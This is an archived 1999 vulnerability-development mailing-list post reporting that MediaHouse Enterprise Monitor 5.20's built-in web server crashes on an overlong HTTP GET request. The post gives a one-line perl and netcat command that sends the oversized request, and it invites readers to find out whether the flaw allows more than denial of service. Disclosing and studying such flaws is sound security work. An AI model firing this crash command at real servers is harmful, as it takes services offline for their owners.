Vulnerability Development mailing list archives

MediaHouse Enterprise Monitor 5.20

From: bofh-exploitdev () DIEGEEKDIE COM (Sebastian Andersson)
Date: Thu, 21 Oct 1999 15:05:42 +0200


        Hiya

"MediaHouse Enterprise Monitor 5.20" (<http://www.mediahouse.com/>) is
a network monitoring program with its own fucked up webserver running
on NT. I crashed it within 2 minutes after I got the url:

perl -e 'print "GET /" . "x"x9999 . "\r\n\r\n"' | nc host 8080

This program has a feature there it is able to reboot other NT machines
and for this to work, you have to store the domain admin name and
password in it. It also monitors stuff like radius servers there it need
usernames/passwords.

I don't know if this can be used for more than stupid DOS attacks and
I know too little about NT to explore this further.
Maybe someone else would like to give it a try?

There is a 30 day trial version to download from their website.

It seems like a rather nice network monitoring program if you put it on
a secure network.

/Sebastian

Current thread:

Re: 2 dodgy network programs, (continued)
- - - Re: 2 dodgy network programs David R. Conrad (Oct 13)
    - Classes? Devin Walters (Oct 16)
    - Re: Classes? Blue Boar (Oct 16)
    - Re: Classes? Dragos Ruiu (Oct 16)
    - Re: Classes? Bacano (Oct 17)
    - Re: Classes? Max Vision (Oct 18)
    - Re: Classes? David R. Conrad (Oct 17)
    - Re: Classes? Crispin Cowan (Oct 18)
    - Re: Classes? George Kurtz (Oct 20)
    - Re: Classes? Max Vision (Oct 24)
    - MediaHouse Enterprise Monitor 5.20 Sebastian Andersson (Oct 21)
    - Re: Classes? Bacano (Oct 19)
    - Re: NT SysKey should be breakable Mikael Olsson (Oct 10)
  - Re: Guestbook perl script (error fix) Vincent Zweije (Oct 09)